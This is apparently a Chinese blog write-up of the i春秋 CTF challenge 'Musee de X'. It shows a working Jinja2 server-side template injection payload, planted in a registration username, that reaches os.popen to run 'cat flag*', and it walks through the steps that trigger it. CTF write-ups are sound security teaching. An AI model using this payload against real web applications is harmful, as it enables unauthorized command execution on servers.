zoukankan      html  css  js  c++  java
  • i春秋Musee de X

    打开提示我们如果要操作就需要登录

    题目也没有给出tips提示

    /tmp/memes/wosun

    注册成功后提示我们我们的文件被储存在了。。。。。可能这道题会用到一句话木马,毕竟他目录都给我们了

    然后去login.php界面登录试试,登录成功后告诉我们点击here的超链接去捐献我们的财富,如果我们什么都没有就让我们出去。。。。然后是退出登录的超链接

    试试点here会出现什么

    又是一个表单填写的窗口

     随意写一个地址,填上我们注册的usernamego一下

     

     出现一大堆报错

     

     据此信息是jinjia2模板

    而我们的用户名在text中,似乎就可以注入了

    先注册用户名为({{前面的可以随意修改,注册成自己的用户名吧)

    wosun{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].__dict__['popen']('cat flag*').read()}}

    然后登录

    捐献照片为底色为黑色的网络照片

    http://pic4.bbzhi.com/jingxuanbizhi/heisediannaozhuomianbizhixiazai/heisediannaozhuomianbizhixiazai_362061_5.jpg

    这里给出一张

    然后go一下就看到flag

     flag{13460551-92a3-ed4f-844d-86f8f12ca99c}

     

     

  • 相关阅读:
    Java图片裁剪
    jvm参数
    Druid数据源监控配置
    执行jar包或执行其中的某个类
    十进制和二进制之间的相互转化
    Java位运算
    获取网络资源保存本地
    前端PHP入门-010-内部函数
    前端PHP入门-011-可变函数
    前端PHP入门-009-匿名函数
  • 原文地址:https://www.cnblogs.com/wosun/p/11527795.html
Copyright © 2011-2022 走看看